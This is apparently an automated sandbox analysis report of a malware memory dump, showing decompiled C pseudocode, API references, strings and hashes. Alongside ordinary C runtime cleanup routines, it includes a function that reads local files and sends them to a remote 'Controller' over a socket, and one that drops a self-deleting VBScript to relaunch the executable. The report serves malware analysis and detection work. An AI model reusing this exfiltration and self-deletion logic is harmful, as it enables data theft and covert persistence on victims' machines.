                0x00444694
                0x00444697
                0x0044469c
                0x004446ba
                0x004446c4
                0x004446c7
                0x004446da
                0x004446dd
                0x004446eb
                0x004446ee
                0x004446fc
                0x004446ff
                0x00444710
                0x00444713
                0x00444716
                0x0044471b
                0x00444721
                0x00444975
                0x00444978
                0x00444980
                0x00444988
                0x00444990
                0x0044499a
                0x0044499a
                0x00000000
                0x0044474a
                0x0044474a
                0x0044474c
                0x0044474c
                0x0044474f
                0x00444750
                0x00444766
                0x00000000
                0x00000000
                0x0044476c
                0x0044476f
                0x00444772
                0x00000000
                0x00000000
                0x0044477f
                0x00444782
                0x00444785
                0x004447a2
                0x004447a7
                0x004447aa
                0x004447ac
                0x00000000
                0x00000000
                0x004447c6
                0x004447d6
                0x004447db
                0x004447e0
                0x00000000
                0x00000000
                0x004447ea
                0x00444817
                0x0044482d
                0x00444830
                0x00444835
                0x0044483a
                0x00000000
                0x00000000
                0x00444840
                0x00444845
                0x0044484b
                0x0044484e
                0x00444851
                0x00444854
                0x00444857
                0x0044485a
                0x00444861
                0x00444864
                0x00444867
                0x00444869
                0x0044486f
                0x00444872
                0x00444874
                0x004448b6
                0x004448b8
                0x004448c1
                0x004448c6
                0x004448c9
                0x004448d3
                0x004448d5
                0x004448d8
                0x004448da
                0x004448e3
                0x004448e5
                0x004448e7
                0x004448e8
                0x004448f3
                0x004448f8
                0x004448fc
                0x0044490a
                0x0044491d
                0x0044492b
                0x00444936
                0x0044493b
                0x004448fc
                0x0044493e
                0x00444941
                0x00444947
                0x00444950
                0x00444955
                0x0044495e
                0x00444967
                0x00444970
                0x0044499b
                0x0044499e
                0x00000000
                0x0044487b
                0x0044487b
                0x0044487e
                0x0044487e
                0x00444882
                0x00000000
                0x00000000
                0x00444884
                0x0044488d
                0x004448ab
                0x004448ab
                0x004448b1
                0x00000000
                0x00000000
                0x00000000
                0x004448b1
                0x00444895
                0x00444898
                0x0044489d
                0x0044489e
                0x004448a1
                0x004448a7
                0x00000000
                0x00444898
                0x00000000
                0x004448b3
                0x004447f1
                0x004447f1
                0x004447f4
                0x004447f4
                0x004447f8
                0x00000000
                0x00000000
                0x004447fa
                0x004447fe
                0x0044480b
                0x00444803
                0x00444807
                0x00444807
                0x00444808
                0x00444808
                0x0044480f
                0x00444812
                0x00444815
                0x00000000
                0x00000000
                0x00000000
                0x00444815
                0x00000000
                0x004447f4
                0x004447ea
                0x00444721
                0x004446aa
                0x004446af
                0x004446b4
                0x00000000
                0x00000000
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                • Instruction ID: ad40bc67768ff577a85139c61b858be7675e1a203c69b77c022c2f93fc340f39
                • Opcode Fuzzy Hash: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                • Instruction Fuzzy Hash: D5B1AFB1900245AFEB20DF79C881BAFBBF4BF49304F14406EF495A7352DB7998419B64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044FB46 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0044FB46(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46f188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00445002(_t46);
							E0044ED82( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00445002(_t47);
							E0044F23C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00445002( *((intOrPtr*)(_t74 + 0x7c)));
						E00445002( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00445002( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00445002( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00445002( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00445002( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0044FCB9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46f2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00445002(_t31);
							E00445002( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xffffcf90
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E00445002(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00445002(_t74);
			}















                0x0044fb4e
                0x0044fb52
                0x0044fb5a
                0x0044fb63
                0x0044fb68
                0x0044fb6f
                0x0044fb77
                0x0044fb7f
                0x0044fb8a
                0x0044fb90
                0x0044fb91
                0x0044fb99
                0x0044fba1
                0x0044fbac
                0x0044fbb2
                0x0044fbb6
                0x0044fbc1
                0x0044fbc7
                0x0044fb68
                0x0044fbc8
                0x0044fbd0
                0x0044fbe3
                0x0044fbf6
                0x0044fc04
                0x0044fc0f
                0x0044fc14
                0x0044fc1d
                0x0044fc25
                0x0044fc26
                0x0044fc2c
                0x0044fc2f
                0x0044fc32
                0x0044fc39
                0x0044fc3b
                0x0044fc3f
                0x0044fc47
                0x0044fc4e
                0x0044fc54
                0x0044fc55
                0x0044fc55
                0x0044fc5c
                0x0044fc5e
                0x0044fc5e
                0x0044fc63
                0x0044fc6b
                0x0044fc70
                0x0044fc71
                0x0044fc71
                0x0044fc74
                0x0044fc77
                0x0044fc7a
                0x0044fc7d
                0x0044fc7d
                0x0044fc8f

                APIs
                • ___free_lconv_mon.LIBCMT ref: 0044FB8A
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044ED9F
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDB1
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDC3
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDD5
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDE7
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDF9
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE0B
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE1D
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE2F
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE41
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE53
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE65
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE77
                • _free.LIBCMT ref: 0044FB7F
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044FBA1
                • _free.LIBCMT ref: 0044FBB6
                • _free.LIBCMT ref: 0044FBC1
                • _free.LIBCMT ref: 0044FBE3
                • _free.LIBCMT ref: 0044FBF6
                • _free.LIBCMT ref: 0044FC04
                • _free.LIBCMT ref: 0044FC0F
                • _free.LIBCMT ref: 0044FC47
                • _free.LIBCMT ref: 0044FC4E
                • _free.LIBCMT ref: 0044FC6B
                • _free.LIBCMT ref: 0044FC83
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                • Instruction ID: 3ab02cf78170ad634f8d0de65b9125c41ac80f736b079e9f2e4498fa10b99b54
                • Opcode Fuzzy Hash: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                • Instruction Fuzzy Hash: 28316D71500A069FFF309A3AE846B5B73E8FF01318F10842FE498D6252DB39EC448B58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004081EE Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E004081EE(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
				char _v12;
				void* _v16;
				char _v28;
				void* _v40;
				char _v52;
				void* _v56;
				char _v64;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v116;
				char _v124;
				char _v128;
				signed int _v140;
				char _v144;
				char _v148;
				struct %anon52 _v156;
				char _v164;
				void* _v168;
				struct %anon52 _v176;
				union _LARGE_INTEGER* _v180;
				void* _v184;
				intOrPtr _v188;
				long _v192;
				signed int _v196;
				intOrPtr _v200;
				union _LARGE_INTEGER* _v204;
				union _LARGE_INTEGER _v208;
				intOrPtr _v216;
				intOrPtr _v220;
				long _v224;
				signed int _v228;
				intOrPtr _v236;
				signed int _v244;
				intOrPtr _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t94;
				void* _t101;
				void* _t111;
				void* _t113;
				void* _t121;
				signed int _t134;
				void* _t135;
				signed int _t136;
				void* _t146;
				void* _t150;
				void* _t161;
				void* _t164;
				signed int _t167;
				struct _OVERLAPPED* _t169;
				struct %anon52 _t192;
				signed int _t208;
				void* _t214;
				union _LARGE_INTEGER* _t247;
				void* _t255;
				void* _t256;
				union _LARGE_INTEGER _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t276;

				_t266 =  &_v184;
				_v140 = _v140 & 0x00000000;
				_t255 = __ecx;
				_v176.LowPart = 0x186a0;
				if(_a4 != 0) {
					_t161 = E00406E3A(0x46a8f0);
					_t278 = _t161;
					if(_t161 != 0) {
						_t276 =  &_v184 - 0x18;
						E004086D0(_t167, _t276, 0x46a8f0, _t278,  &_a8);
						_t164 = E00419F8D(_t167,  &_v52, 0x46a8f0, _t264);
						_t266 = _t276 + 0x18;
						E00401EF3( &_a28, 0x46a8f0, _t256, _t164);
						E00401EE9();
					}
				}
				E0040480D(_t255);
				E004048A8(_t255, _t256, _t255);
				_t94 = E0041A879(_t167,  &_v124,  &_a28);
				_t267 = _t266 - 0x18;
				_t246 = E00402EF0(_t167,  &_v52, E00402EF0(_t167,  &_v28, E00402EF0(_t167,  &_v100, E0041A879(_t167,  &_v76,  &_a4), _t264, _t278, 0x472ec8), _t264, _t278,  &_a52), _t264, _t278, 0x472ec8);
				E00402E81(_t267, _t99, _t94);
				_push(0xb6);
				_t101 = E00404A81(_t255, _t99, _t278);
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
					_t169 = 0;
					_t265 = CreateFileW(E00401EE4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
					__eflags = _t265 - 0xffffffff;
					if(__eflags != 0) {
						_v148 = 0;
						_v144 = 0;
						__imp__GetFileSizeEx( &_v148);
						_t247 = _v156.HighPart;
						_t192 = _v156;
						_v176 = _t192;
						_v180 = _t247;
						_v208.LowPart = _t192;
						_v200 = _t247;
						_v196 = 1;
						_v192 = 0;
						_t111 = E00455B00(_t192, _t247, 0x186a0, 0);
						asm("adc edx, ebx");
						_t113 = E0041A723(0,  &_v140, _t247, _t111 + 1, _t247);
						_t268 = _t267 - 0x10;
						E00402E81(_t268, E00402EF0(0,  &_v164, E0041A723(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x472ec8), _t113);
						E00404A81(_t255, _t115, __eflags, 0xb7, _t265);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						_t121 = E0041A819( &_v192,  &_v64);
						_t269 = _t268 - 0x18;
						_t251 = "Uploading file to Controller: ";
						E004052DD(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
						_t270 = _t269 - 0x14;
						E00402073(0, _t270, "Uploading file to Controller: ", _t265, "i");
						E0041A04A(0, _t255);
						_t271 = _t270 + 0x30;
						_t208 =  &_v196;
						E00401FB8();
						asm("xorps xmm0, xmm0");
						asm("movlpd [esp+0x40], xmm0");
						__eflags = _v228;
						if(__eflags < 0) {
							L22:
							CloseHandle(_t265);
							E00404E06(_t251);
							_t169 = 1;
							goto L23;
						}
						if(__eflags > 0) {
							L11:
							_t261 = 0;
							__eflags = 0;
							_v204 = _v180;
							_v208.LowPart = _v184;
							_t134 = 0x186a0;
							goto L12;
							do {
								do {
									L12:
									_t246 = _v220;
									__eflags = _t261 - _t246;
									if(__eflags < 0) {
										L16:
										_push(_t134);
										_t135 = E004330A3(_t208, _t246, _t261, __eflags);
										_push(_t169);
										_t262 = _t135;
										_v192 = _t169;
										_v184 = _t262;
										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
										__eflags = _t136;
										if(_t136 == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("SetFilePointerEx error");
											L27:
											E00402073(_t169, _t214, _t246, _t265);
											E00402073(_t169, _t272 - 0x18, _t246, _t265, "E");
											E0041A04A(_t169, _t255);
											E004330AC(_t262);
											CloseHandle(_t265);
											L28:
											E00404E06(_t246);
											goto L23;
										}
										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
										if(__eflags == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("ReadFile error");
											goto L27;
										}
										_t146 = E00402097(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
										_t271 = _t271 - 0x18;
										_t253 = E00402EF0(_t169,  &_v176, E0041A723(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x472ec8);
										E00402E81(_t271, _t148, _t146);
										_push(0x52);
										_t150 = E00404A81(_t255, _t148, __eflags);
										__eflags = _t150 - 0xffffffff;
										E00401FB8();
										E00401FB8();
										E00401FB8();
										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
											E00404E06(_t253);
											CloseHandle(_t265);
											E004330AC(_v204);
											goto L5;
										}
										goto L19;
									}
									_t208 = _v228;
									if(__eflags > 0) {
										L15:
										_t134 = _t208;
										_v188 = _t246;
										_v224 = _t134;
										goto L16;
									}
									__eflags = _t134 - _t208;
									if(__eflags <= 0) {
										goto L16;
									}
									goto L15;
									L19:
									E004330AC(_v204);
									_t134 = _v244;
									_v248 = _v248 - _t134;
									_t261 = _v208;
									asm("sbb [esp+0x20], esi");
									_v236 = _v236 + 1;
									_t251 = _v224;
									_t169 = 0;
									asm("adc [esp+0x24], ebx");
									_t208 = _v228 + _t134;
									_v228 = _t208;
									asm("adc edx, esi");
									_v224 = _t251;
									__eflags = _t251 - _v220;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L22;
								}
								__eflags = _t208 - _v216;
							} while (_t208 < _v216);
							goto L22;
						}
						__eflags = _v196;
						if(_v196 <= 0) {
							goto L22;
						}
						goto L11;
					}
					E00402073(0, _t267 - 0x18, _t246, _t265, 0x464074);
					_push(0x53);
					E00404A81(_t255, _t246, __eflags);
					goto L28;
				} else {
					E00404E06(_t246);
					L5:
					_t169 = 0;
					L23:
					E00401EE9();
					E00401EE9();
					E00401FB8();
					return _t169;
				}
			}









































































                0x004081ee
                0x004081f4
                0x00408205
                0x00408207
                0x0040820f
                0x0040821d
                0x00408222
                0x00408224
                0x00408226
                0x00408233
                0x0040823f
                0x00408244
                0x0040824f
                0x0040825b
                0x0040825b
                0x00408224
                0x00408262
                0x0040826a
                0x0040827a
                0x0040827f
                0x004082d4
                0x004082d8
                0x004082de
                0x004082e5
                0x004082f7
                0x00408303
                0x0040830c
                0x00408318
                0x00408321
                0x00408328
                0x00408338
                0x0040835d
                0x0040835f
                0x00408362
                0x00408385
                0x0040838b
                0x0040838f
                0x00408395
                0x0040839e
                0x004083a8
                0x004083ad
                0x004083b1
                0x004083b5
                0x004083b9
                0x004083bd
                0x004083c1
                0x004083cc
                0x004083d0
                0x004083d5
                0x00408406
                0x00408413
                0x0040841c
                0x00408428
                0x00408431
                0x00408441
                0x00408446
                0x00408449
                0x00408451
                0x00408456
                0x00408460
                0x00408465
                0x0040846a
                0x0040846d
                0x00408471
                0x00408476
                0x00408479
                0x0040847f
                0x00408483
                0x004085d7
                0x004085d8
                0x004085e0
                0x004085e5
                0x00000000
                0x004085e5
                0x00408489
                0x00408495
                0x00408499
                0x00408499
                0x0040849b
                0x004084a3
                0x004084a7
                0x004084a7
                0x004084ac
                0x004084ac
                0x004084ac
                0x004084ac
                0x004084b0
                0x004084b2
                0x004084c8
                0x004084c8
                0x004084c9
                0x004084cf
                0x004084d5
                0x004084d7
                0x004084df
                0x004084e4
                0x004084ea
                0x004084ec
                0x00408643
                0x00408646
                0x00408648
                0x0040864d
                0x0040864d
                0x0040865c
                0x00408661
                0x00408667
                0x00408670
                0x00408676
                0x00408678
                0x00000000
                0x00408678
                0x00408505
                0x00408507
                0x00408637
                0x0040863a
                0x0040863c
                0x00000000
                0x0040863c
                0x00408516
                0x0040851b
                0x00408548
                0x0040854c
                0x00408552
                0x00408556
                0x0040855b
                0x00408565
                0x00408571
                0x0040857a
                0x0040857f
                0x00408581
                0x0040861c
                0x00408622
                0x0040862c
                0x00000000
                0x00408631
                0x00000000
                0x00408581
                0x004084b4
                0x004084b8
                0x004084be
                0x004084be
                0x004084c0
                0x004084c4
                0x00000000
                0x004084c4
                0x004084ba
                0x004084bc
                0x00000000
                0x00000000
                0x00000000
                0x00408587
                0x0040858b
                0x00408590
                0x00408594
                0x00408598
                0x0040859c
                0x004085a0
                0x004085a5
                0x004085b0
                0x004085b1
                0x004085b5
                0x004085b7
                0x004085bb
                0x004085bd
                0x004085c1
                0x004085c1
                0x004085cb
                0x00000000
                0x00000000
                0x004085cd
                0x004085cd
                0x00000000
                0x004084ac
                0x0040848b
                0x0040848f
                0x00000000
                0x00000000
                0x00000000
                0x0040848f
                0x0040836e
                0x00408373
                0x00408377
                0x00000000
                0x0040832a
                0x0040832c
                0x00408331
                0x00408331
                0x004085e7
                0x004085ee
                0x004085fa
                0x00408606
                0x00408617
                0x00408617

                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408357
                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040838F
                • __aulldiv.LIBCMT ref: 004083C1
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004084E4
                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004084FF
                • CloseHandle.KERNEL32(00000000), ref: 004085D8
                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408622
                • CloseHandle.KERNEL32(00000000), ref: 00408670
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                • API String ID: 3086580692-2596673759
                • Opcode ID: 083f2e6c64cd084b7695d2d8b84ee30fbdaf5cb9a0a83046b1f80f092be4087f
                • Instruction ID: 2e3c2baa84d0001f6d92d6a12086262f6ba3ffa6ab37ef3033deaea4bc0aa555
                • Opcode Fuzzy Hash: 083f2e6c64cd084b7695d2d8b84ee30fbdaf5cb9a0a83046b1f80f092be4087f
                • Instruction Fuzzy Hash: 31B1C1316083409BC314FB65C981AAFB7E9AFC4354F40492FF489622D2EF789945CB9B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040CD03 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040CD03(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;
				void* _t137;

				_t79 = __ebx;
				E00411D93();
				_t36 = E0040245C();
				_t37 = E00401F8B(0x473280);
				_t40 = E004129E0(E00401F8B(0x473238), "exepath",  &_v716, 0x208, _t37, _t36);
				_t141 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00402FF4(_t79,  &_v124, E0041A7B9( &_v52, E0041A4D3( &_v76)), 0, _t137, _t141, L".vbs");
				E00401EE9();
				E00401FB8();
				E004042FD(_t79,  &_v100, E00402FF4(_t79,  &_v76, E0040415E(_t79,  &_v52, _t42, _t137, E0043A99F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
				E00401EE9();
				E00401EE9();
				E00401F66(_t79,  &_v28);
				_t54 = E0040415E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
				E0040323D(E00402FF4(_t79,  &_v76, E00402F85( &_v52, E00402FF4(_t79,  &_v148, E0040415E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				L004086C6(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00401EE4( &_v100);
				_t68 = E0040245C();
				E00401EE4( &_v28);
				if(E0041AD6A(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v100), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE9();
				E00401EE9();
				return E00401EE9();
			}






















                0x0040cd03
                0x0040cd0e
                0x0040cd1a
                0x0040cd22
                0x0040cd46
                0x0040cd50
                0x0040cd52
                0x0040cd5d
                0x0040cd5d
                0x0040cd7f
                0x0040cd88
                0x0040cd90
                0x0040cdc2
                0x0040cdcb
                0x0040cdd3
                0x0040cddb
                0x0040cdf0
                0x0040ce35
                0x0040ce3d
                0x0040ce45
                0x0040ce50
                0x0040ce5b
                0x0040ce66
                0x0040ce73
                0x0040ce7c
                0x0040ce85
                0x0040ce91
                0x0040cea3
                0x0040cec8
                0x0040cec8
                0x0040ced1
                0x0040ced9
                0x0040ceeb

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                  • Part of subcall function 004129E0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                  • Part of subcall function 004129E0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                  • Part of subcall function 004129E0: RegCloseKey.ADVAPI32(00000000), ref: 00412A20
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040CD5D
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CEBC
                • ExitProcess.KERNEL32 ref: 0040CEC8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                • String ID: """, 0$.vbs$82G$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                • API String ID: 1913171305-4128442165
                • Opcode ID: cdd023095726231c7c12aae242b21c22803419696d2755be4f4e3bfbff4b2c5f
                • Instruction ID: 0874bc144836ff93359e0d920a8661d2d2bf12b9c69f7d2e1fc1beb4cd6de9cb
                • Opcode Fuzzy Hash: cdd023095726231c7c12aae242b21c22803419696d2755be4f4e3bfbff4b2c5f
                • Instruction Fuzzy Hash: C9414F319101185ACB14F7A2DC96DEE77B9AF50708F10017FF506B21E2EE385A4ACA99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044EE80 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E0044EE80(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E004443F4(0, 1, 0x50);
					_v8 = _t234;
					E00445002(0);
					if(_t234 != 0) {
						_t227 = E004443F4(0, 1, 4);
						_v12 = _t227;
						E00445002(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46f188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E004443F4(0, 1, 4);
							_v16 = _t232;
							E00445002(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E004516F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E004516F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E004516F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E004516F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E004516F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
